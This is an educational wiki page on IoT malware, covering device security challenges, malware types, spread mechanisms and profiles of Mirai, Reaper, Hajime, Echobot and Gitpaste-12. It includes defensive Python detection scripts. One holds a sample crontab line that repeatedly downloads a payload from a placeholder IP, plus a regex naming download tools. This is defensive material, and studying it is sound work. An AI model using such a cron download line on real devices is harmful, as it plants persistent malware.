IoT Malware

From Embedded Lab Vienna for IoT & Security

Internet of Things (IoT) Malware: Theoretical Foundations and Types

Overview

The Internet of Things (IoT) refers to the network of interconnected devices capable of collecting, exchanging, and analyzing data. Coined by Kevin Ashton in 1999, the concept has grown significantly over the years. By 2008, the number of connected devices surpassed the world population, reaching over 8 billion. IoT devices are employed in various sectors, including smart homes, healthcare, transportation, agriculture, and more. However, the convenience offered by these devices often overshadows their security risks. [1]

Types of Connected Devices in IoT

Applications

  1. Smart Homes and Cities: Enhance life quality through energy efficiency and convenience but pose security risks due to processing sensitive data.
  2. Wearables for Health Monitoring: Collect personal health data, necessitating stringent protection measures.
  3. Transport and Logistics: Use RFID toll sensors and tracking for supply chain efficiency.
  4. Automotive Industry: Sensors and autonomous driving technologies introduce new data security and privacy challenges.
  5. Medical and Healthcare: Require robust security to protect sensitive patient data.
  6. Aviation and Telecommunications: Demand reliable and secure IoT solutions to prevent catastrophic failures.
  7. Agriculture and Livestock Management: Benefit from IoT for efficiency but need protection against environmental factors and cyber threats. [2]


Wireless Protocols

  1. Cellular (GSM, GPRS, 3G, 4G, LTE, 5G): Ideal for applications requiring mobility and remote connectivity.[1]
  2. Wi-Fi (IEEE 802.11): Suitable for building-based IoT applications, like smart home devices.
  3. Zigbee: A low-energy protocol, perfect for energy-efficient applications like smart home sensors.
  4. Z-Wave: Similar to Zigbee but operates on slightly different frequencies, commonly used in home automation.
  5. Bluetooth (including Low Energy): Best for short-range, low-energy applications like wearables and health monitors.
  6. 6LoWPAN: Facilitates IPv6 packet transmission over low-energy wireless networks, useful for devices with limited computing resources. [3]


Communication Protocols

  1. MQTT (Message Queuing Telemetry Transport): Lightweight, efficient for devices with limited resources or low-bandwidth networks.
  2. XMPP (Extensible Messaging and Presence Protocol): Initially developed for instant messaging, adaptable for various IoT applications.
  3. DDS (Data Distribution Service for Real-Time Systems): Focused on real-time data exchange, used in critical systems like aviation or healthcare.
  4. AMQP (Advanced Message Queuing Protocol): Ensures reliable, secure messaging, suitable for enterprise-level and complex IoT systems.

Security Concerns in IoT

Priorities

  1. Availability: Crucial for time-sensitive functions in medical or industrial applications.[4]
  2. Integrity: Vital to avoid malfunctions and misinterpretations in critical decision-making scenarios.
  3. Confidentiality: Important but often considered less critical than availability and integrity.[5]


Challenges

  1. Vulnerability Management: Many IoT devices lack the capability for regular updates, leaving known security gaps unpatched.[1]
  2. Limited Resources: Small form factors and low power consumption restrict computing capabilities, complicating the implementation of complex security measures like advanced encryption.
  3. User Interface Limitations: Lack of comprehensive user interfaces leads to a lower awareness of security settings and risks.
  4. Protocol Limitations: Some IoT protocols do not inherently support encryption or authentication, making devices vulnerable to attacks like Man-in-the-Middle.
  5. Weak Password Protection: Hard-coded and default passwords are major security loopholes. Mirai and Reaper malware exploited these vulnerabilities to create large-scale botnets. Manufacturers should implement secure default settings and robust authentication mechanisms, like two-factor authentication and digital certificates.
  6. Lack of Regular Patches and Updates: IoT devices become vulnerable over time if not regularly updated. Satori malware exploited this by targeting specific Wi-Fi routers. Manufacturers should provide regular security updates, and network managers should ensure secure update mechanisms, including encrypted exchanges for authenticity.
  7. Insecure Interfaces: Many vulnerabilities stem from insecure web, application API, cloud, and mobile interfaces. Common issues include insufficient authentication and weak encryption. Solutions include robust device authentication and digital certificates to ensure secure data transfer.
  8. Insufficient Data Protection: IoT devices often lack secure data storage and network segregation. This can lead to breaches like the 2017 casino attack through a thermostat. Cryptography is crucial for protecting data in motion and at rest.
  9. Poor IoT Device Management: A study revealed that up to 15% of devices in networks were unknown or unauthorized, and many used unsupported legacy operating systems. IoT device management platforms can significantly reduce vulnerabilities by providing lifecycle management capabilities.
  10. The IoT Skills Gap: Addressing IoT security requires skilled personnel. Companies face challenges in hiring new talents and must rely on training and upskilling existing teams to handle IoT security effectively.

IoT Malware: In-Depth Analysis and Types

Evolution and Threat Landscape

Over time, malware has evolved significantly in complexity and destructive potential, posing a threat to a wide range of devices. This section covers the malware types defined by their functions and behaviors, including worms, Trojans, viruses, spyware, ransomware, rootkits, and backdoors. IoT malware often combines elements from several of these categories, so the categorization is not always clear-cut. A common characteristic of this malware is its reliance on botnets for distribution, command execution, control, and monitoring of infected systems.

Classification of IoT Malware

Worms

Self-propagating malware that spreads autonomously between IoT devices. Examples include Mirai, Darlloz, Brickerbot, and Gitpaste-12. Notably, Hajime, a white-hat malware, can counteract other malware, offering a unique perspective on IoT malware functionality. [6]

Trojans

Trojans disguise themselves as harmless but contain hidden malicious functions. Unlike viruses, they cannot replicate themselves. An example is ProxyM, known for DDoS attacks and email spamming.

Viruses

Viruses attack IoT devices by self-replicating. The Silex virus, for instance, renders devices permanently unusable (a permanent denial of service), demonstrating the severe impact of IoT viruses.

Spyware

Spyware in IoT allows for the covert surveillance of data through infected devices. SpyCon is an instance of spyware that monitors user activities through smart home devices and mobile phones.

Ransomware

This malware type takes devices hostage and demands a ransom for their release.

Backdoor

Backdoors in IoT devices are hidden access mechanisms, often introduced by manufacturers, posing significant security risks. Examples include Tsunami and Bashlite.

IoT Malware Spread Mechanisms

Command-and-Control (C&C)

A centralized structure that commands bots via communication protocols like Internet Relay Chat or Hypertext Transfer Protocol. Its simplicity makes it common, but its central server is also a single point of failure that defenders can target. Examples include Mirai, Aidra, and Okane. [7]

Peer-to-Peer (P2P)

A decentralized architecture where each bot acts as both server and client, making network disruption challenging. An example of P2P-based IoT malware is the Hajime worm.

Characteristics and Functionality of IoT Malware

IoT malware aims to gain unauthorized access to, or otherwise compromise, IoT devices. Common delivery methods include malvertising, phishing emails, infected USB drives, and fake software installations.

Attack Methods

  • DDoS Attacks: Overload resources to make them inaccessible. Examples: Mirai, Kaiji. [8]
  • Coin Mining: Malware like Fritzfrog and Satori use compromised IoT devices for cryptocurrency mining.
  • Spamming: ProxyM uses infected devices for spamming.
  • Data Exfiltration: Malware like Mozi executes unauthorized data transfers.
  • PDoS Attacks: Permanently damage hardware, e.g., Brickerbot.
  • DNS Spoofing: Change DNS entries to redirect traffic to harmful sites.
  • Command Injection: Exploit vulnerable web interfaces or applications to execute commands on IoT devices.
  • Payload Execution: Malware remains dormant until activated.
  • Ransomware: Encrypts device files and demands ransom.
  • Industrial Espionage: Targets industrial operations, often focusing on SCADA systems.
  • Website Hacking: Unauthorized access to websites for data theft or malware placement.
  • Click Fraud: Manipulates online marketing by generating fake clicks.
  • Other Attack Types: Includes less common types like White-Hat attacks and unauthorized data downloading or removal.

Attack Vectors

IoT malware targets various vulnerabilities across the network, human, and software attack surfaces. In IoT, a distinction is made between the network level (including network devices), the service level, the firmware level, and the device level.

  • Network and Network Devices: Vulnerabilities in IoT networks and firewalls.[9]
  • Services: Vulnerabilities in Software as a Service and Server as a Service offerings.
  • Firmware: Central to device communication and often a target of PDoS attacks.
  • Devices: Specific device components can be targeted, including ports, storage media, RAM, and hardware.

Device Access Mechanisms

IoT devices can be accessed via intranet or internet, offering various mechanisms for malware to exploit.

  • Brute-Force Attacks: Continuous input of login credentials to gain access.
  • CVE Exploits: Utilization of public security vulnerabilities.
  • Targeted Access Mechanisms: Specific targeting of devices based on geography, industry, etc.

IoT Malware Characteristics

  • Virtual Environment Detection: Determines if running in a virtual environment to avoid detection.[9]
  • Surviving Reboots: Copies itself to startup directories.
  • Stealth: Hides presence to avoid detection.
  • Transforming Device Functions: Converts devices into networks, honeypots, or proxy servers.
  • Reboot Prevention: Avoids device restart to prevent malware removal.
  • Port Closure: Closes unused ports to reduce vulnerabilities.
  • Creating New Variants: Developers release source codes for creating new variants.
  • Service Provision: Some malware offers DDoS-for-hire or ransomware services.
  • Packet Size: Malicious network traffic can exhibit unusual packet sizes.
  • Architecture Detection: Sends payloads matching the device's architecture.
  • Periodic Command Execution: Similar to CRON jobs, executes specific commands at intervals.
  • Binary File Removal: Removes binary files to remain in RAM and avoid detection.
  • Name Theft and Assignment: Steals or assigns random names to processes for concealment.
  • UPX Header Manipulation: Uses fake UPX headers to hinder analysis.
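A host-side check for three of the traits above (binary file removal, name theft, periodic command execution), added here as an example that is not part of the original page: it triages a constructed /proc-style snapshot and a constructed crontab; the entry layout, the sample paths and addresses, and the download pattern are assumptions.

```python
"""Triage a /proc-style snapshot for IoT-malware traits (added example).

Checks: a process whose executable was unlinked after start (runs from RAM
only), a process whose name does not match its executable (name theft), and
a cron entry that periodically re-fetches a remote payload. The snapshot
below is constructed for this example; field names are assumptions."""
from dataclasses import dataclass
import os
import re

@dataclass
class ProcEntry:
    pid: int
    comm: str       # contents of /proc/<pid>/comm
    exe: str        # readlink of /proc/<pid>/exe
    cmdline: str    # /proc/<pid>/cmdline with NULs replaced by spaces

def deleted_binary(p: ProcEntry) -> bool:
    # Linux appends " (deleted)" to the exe link once the file is unlinked.
    return p.exe.endswith(" (deleted)")

def name_mismatch(p: ProcEntry) -> bool:
    # comm is truncated to 15 characters, so compare the truncated basename.
    base = os.path.basename(p.exe.replace(" (deleted)", ""))
    return p.comm != base[:15]

# Periodic re-download of a payload, e.g. "*/5 * * * * wget http://..."
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp)\b.*\b(https?|tftp)://", re.I)

def suspicious_cron_lines(crontab: str):
    return [ln for ln in crontab.splitlines()
            if ln and not ln.startswith("#") and DOWNLOAD_RE.search(ln)]

def triage(procs, crontab):
    """Return (pid, finding) tuples; pid 0 marks crontab findings."""
    findings = []
    for p in procs:
        if deleted_binary(p):
            findings.append((p.pid, "binary removed from disk"))
        if name_mismatch(p):
            findings.append((p.pid, f"process name '{p.comm}' does not match '{p.exe}'"))
    for ln in suspicious_cron_lines(crontab):
        findings.append((0, f"cron fetches remote payload: {ln}"))
    return findings

# Constructed snapshot: a normal SSH daemon, a deleted-binary process posing
# as sshd, and a crontab that re-downloads a payload every five minutes.
SAMPLE_PROCS = [
    ProcEntry(412, "dropbear", "/usr/sbin/dropbear", "/usr/sbin/dropbear -p 22"),
    ProcEntry(917, "sshd", "/tmp/.x/node (deleted)", "/tmp/.x/node"),
]
SAMPLE_CRONTAB = ("# m h dom mon dow command\n"
                  "*/5 * * * * wget -q http://198.51.100.9/update.bin -O /tmp/u\n")

if __name__ == "__main__":
    for pid, msg in triage(SAMPLE_PROCS, SAMPLE_CRONTAB):
        print(f"[pid {pid}] {msg}")
```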

Prominent Examples of Successful IoT Malware

  • Mirai: Mirai is a well-known malware that specifically targets IoT devices running Linux. It gains access through Telnet ports (23 or 2323) via brute-force attacks. This malware converts the infected devices into bots for a botnet, used predominantly for large-scale DDoS attacks. Mirai has a wide target range, affecting devices across multiple architectures such as ARM, MIPS, and x86. Historically significant, Mirai was responsible for notable disruptions, including the attacks on journalist Brian Krebs's website and the DNS provider Dyn in 2016. The release of its source code on Hackforums by an individual known as Anna-senpai led to a surge in IoT botnet activities. Mirai's characteristic features include monopolizing infected devices, obscuring its process name, employing a specialized CB server for device infection, and using advanced SYN scanning. It is capable of executing a variety of attack methods including UDP floods, DNS water torture, and SYN floods. For detection, ISPs can identify bot devices and CNC servers by scrutinizing network traffic for specific patterns. Defense against Mirai involves a strategy where a defensive program continuously connects to port 48101, causing any infecting Mirai instance to self-terminate. [10]
  • IoTReaper (Reaper): First reported by the IT analyst yegenshen at Netlab 360 in October 2017, IoTReaper, also known as Reaper, is a botnet targeting IoT devices. Differing from Mirai, Reaper exploits specific vulnerabilities rather than using default passwords. By November 2017, it had infected about 28,000 devices, with millions more potentially vulnerable. The malware uses exploits from nine IoT devices, including routers and cameras from D-Link, Netgear, and others. Notably agile, its authors quickly integrate new vulnerabilities into the botnet. Reaper operates on a LUA scripting environment, enhancing its capability for complex attacks. The botnet's architecture includes a downloader, controller, reporter, and loader for different operations. Although its full intent was unknown as of late 2017, the botnet's potential for large-scale attacks and facilitating other malware types was significant. Reaper's success in evading common IT security measures highlights the need for deep packet inspection and real-time anomaly detection for effective defense. [11] [12]
  • Hajime: First observed in October 2016 by RapidityNetworks, Hajime is an IoT worm that creates a vast peer-to-peer botnet, which had reached nearly 300,000 devices by April 2017. Its purpose remains unclear, as it has not been used for malicious activities. Hajime is known for its evolving capabilities, using methods like TR-069 exploitation, Telnet default password attacks, and Arris cable modem attacks. It targets a wide range of IoT devices and continuously updates its attack vectors, making it a sophisticated and adaptable threat. The worm has an architecture detection mechanism to ensure the appropriate binary is used for different device architectures, and it employs smart password bruteforcing for specific brands and devices. Despite its size and capabilities, Hajime has notably avoided attacking certain networks and regions. [13] [14]
  • Echobot: Emerging in mid-May, Echobot is a Mirai variant initially identified by Palo Alto Networks and subsequently analyzed by Akamai. It doesn't alter the original Mirai source code but adds numerous modules. Initially, Echobot targeted 18 vulnerabilities, rapidly evolving to exploit 26, and then over 50. This variant is known for its broad targeting of IoT devices and enterprise applications, including vulnerabilities in products like Oracle WebLogic and VMware SD-WAN. Its exploit selection includes a range of vulnerabilities, both old and new, without preference for age. Security researcher Carlos Brendel noted that Echobot's exploit list provides insight into the most attacked devices and vulnerabilities, as it includes the most effective exploits for botnet propagation. Echobot's architecture is designed to cover a wide range of processor architectures, making it a significant threat to a diverse array of systems. [15] [16]
  • Gitpaste-12: Detected by Juniper Threat Labs in October 2020, Gitpaste-12 is a sophisticated botnet that uses GitHub and Pastebin for hosting its components. Named for its use of 12 known vulnerabilities, Gitpaste-12 is designed to attack Linux servers and IoT devices, leveraging exploits in popular open-source components like Apache Struts and MongoDB. The malware sets up cron jobs for persistence and employs various methods, including a Monero cryptocurrency miner, brute-force attacks, and reverse shells. Gitpaste-12's ability to use trusted sites for hosting and its varied attack vectors make it a significant threat. The malware's development indicates ongoing efforts to evolve its capabilities, highlighting the importance of vigilance in software supply chain security. [17] [18]
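The Mirai detection point above (identifying bots by traffic patterns on Telnet ports 23 and 2323) in working code, as an added example that is not from the page or any of its cited sources: it scores SYN records by Telnet fan-out and by the original Mirai scanner's habit of setting the TCP sequence number to the destination IPv4 address (a trait known from the leaked source, not stated on this page); the record layout, sample addresses and fan-out threshold are assumptions.

```python
"""Flag hosts showing Mirai-style Telnet scanning in SYN metadata (added example).

Two heuristics, evaluated per source address over constructed SYN records:
  * fan-out to many distinct destinations on ports 23/2323 (brute-force scanning),
  * TCP sequence number equal to the destination IPv4 address, a trait of the
    original Mirai scanner. The threshold of 20 destinations is an assumption."""
from collections import defaultdict
from ipaddress import IPv4Address

TELNET_PORTS = {23, 2323}
FANOUT_THRESHOLD = 20  # assumed; tune to the monitored network

def ipv4_to_int(ip: str) -> int:
    return int(IPv4Address(ip))

def analyse_syns(records):
    """records: iterable of (src_ip, dst_ip, dst_port, tcp_seq) for SYN packets.

    Returns {src_ip: {"targets": n, "seq_matches": m}} for sources whose
    Telnet fan-out reaches FANOUT_THRESHOLD; seq_matches counts SYNs that
    carry the Mirai sequence-number quirk."""
    targets = defaultdict(set)
    seq_matches = defaultdict(int)
    for src, dst, dport, seq in records:
        if dport not in TELNET_PORTS:
            continue
        targets[src].add(dst)
        if seq == ipv4_to_int(dst):
            seq_matches[src] += 1
    return {src: {"targets": len(t), "seq_matches": seq_matches[src]}
            for src, t in targets.items() if len(t) >= FANOUT_THRESHOLD}

def build_sample():
    """Constructed sample: one scanner sweeping 30 hosts on 23/2323 with
    seq == destination address, plus one ordinary admin Telnet session."""
    recs = []
    for i in range(30):
        dst = f"198.51.100.{i + 1}"
        port = 23 if i % 2 == 0 else 2323
        recs.append(("203.0.113.7", dst, port, ipv4_to_int(dst)))
    recs.append(("192.0.2.10", "198.51.100.5", 23, 0x1A2B3C4D))
    return recs

if __name__ == "__main__":
    for src, info in analyse_syns(build_sample()).items():
        print(f"{src}: {info['targets']} Telnet targets, "
              f"{info['seq_matches']} SYNs with Mirai seq quirk")
```

On live data the records would come from a flow collector or packet capture; the same function applies unchanged.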

References

  1. Fotios Chantzis, "Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things," No Starch Press, 2021, ISBN 978-1-7185-0091-4.
  2. "5 Key IoT Applications in Smart Cities" - available under: https://www.iotforall.com/5-key-iot-applications-in-smart-cities/ - Retrieved 2023-12-17.
  3. "Top 10 IoT Segments in 2020 – Based on 1,600 Real IoT Projects" - available under: https://iot-analytics.com/top-10-iot-segments-2020/ - Retrieved 2023-12-17.
  4. "Number of Connected IoT Devices" - available under: https://iotanalytics.com/number-connected-iot-devices - Retrieved 2023-12-23.
  5. "IoT Security: Threats and Solutions Report 2020" - available under: https://iot-analytics.com/iot-security-threats-and-solutions-report-2020/ - Retrieved 2023-12-23.
  6. "A survey of IoT malware and detection methods based on static features" - available under: https://www.sciencedirect.com/science/article/pii/S2405959520300503 - Retrieved 2023-12-23.
  7. Victor, P., Lashkari, A.H., Lu, R. et al. "IoT malware: An attribute-based taxonomy, detection mechanisms and challenges." Peer-to-Peer Netw. Appl. 16, 1380–1431 (2023) - available under: https://doi.org/10.1007/s12083-023-01478-w - Retrieved 2024-01-05.
  8. "Cyber security common attack methods" - available under: https://censis.org.uk/what-we-do/sensing-imaging-iot/internet-of-things-iot/cyber-security-common-attack-methods/ - Retrieved 2024-01-05.
  9. "The IoT Attack Surface: Threats and Security Solutions" - available under: https://www.trendmicro.com/vinfo/mx/security/news/internet-of-things/the-iot-attack-surface-threats-and-security-solutions - Retrieved 2024-01-05.
  10. "The Mirai Botnet: Threats and Mitigations" - available under: https://www.cisecurity.org/insights/blog/the-mirai-botnet-threats-and-mitigations - Retrieved 2024-01-05.
  11. "New Rapidly Growing IoT Botnet Reaper" - available under: https://success.trendmicro.com/dcx/s/solution/1118928-new-rapidly-growing-iot-botnet-reaper?language=en_US&sfdcIFrameOrigin=null - Retrieved 2024-01-05.
  12. "Linux.IotReaper Analysis" - available under: https://www.securityartwork.es/2018/02/14/linux-iotreaper-analysis/ - Retrieved 2024-01-05.
  13. "Rise of Botnets: Mirai & Hajime" - available under: https://www.radware.com/security/ddos-threats-attacks/ddos-attack-types/rise-of-botnets-mirai-hajime/ - Retrieved 2024-01-05.
  14. "Hajime – the mysterious evolving botnet" - available under: https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/ - Retrieved 2024-01-05.
  15. "Cyber Alerts 2019 CC-3101" - available under: https://digital.nhs.uk/cyber-alerts/2019/cc-3101 - Retrieved 2024-01-05.
  16. "Echobot Malware Now Up to 71 Exploits - Targeting SCADA" - available under: https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada - Retrieved 2024-01-05.
  17. "Cyber Alerts 2020 CC-3663" - available under: https://digital.nhs.uk/cyber-alerts/2020/cc-3663 - Retrieved 2024-01-05.
  18. "Gitpaste-12 Worm Botnet Returns with 30+ Vulnerability Exploits" - available under: https://www.bleepingcomputer.com/news/security/gitpaste-12-worm-botnet-returns-with-30-plus-vulnerability-exploits/ - Retrieved 2024-01-05.